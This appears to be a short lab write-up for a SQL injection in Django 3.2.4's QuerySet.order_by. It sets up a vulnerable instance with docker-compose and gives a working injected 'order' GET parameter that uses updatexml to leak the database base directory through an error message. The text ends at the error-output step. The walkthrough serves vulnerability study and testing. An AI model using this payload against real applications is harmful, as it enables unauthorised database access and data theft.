Django released a security update on July 1, 2021, which fixes a SQL injection vulnerability in the function QuerySet.order_by.
Reference link:
The vulnerability requires the developer to use order_by function. Moreover, the input of the queryset can be controlled.
Compile and start a vulnerable Django 3.2.4 by executing the following command:
Docker-compose build
Docker-compose up -d
After the environment is started, you can see the home page of Django at http://your-ip:8000.
First, go to the list-view http://your-ip:8000/vuln/ and add order=-id to the GET parameter.
http://your-ip:8000/vuln/?order=-id
You will see the data sorted by id in descending order:
Add order=vuln_collection.name);select updatexml(1, concat(0x7e,(select @@basedir)),1)%23 to the GET parameter, where vuln is your app and collection is the models.
http://your-ip:8000/vuln/?order=vuln_collection.name);select%20updatexml(1,%20concat(0x7e,(select%20@@basedir)),1)%23
You can see that the single bracket has been injected successfully, and you can get the information from the error:
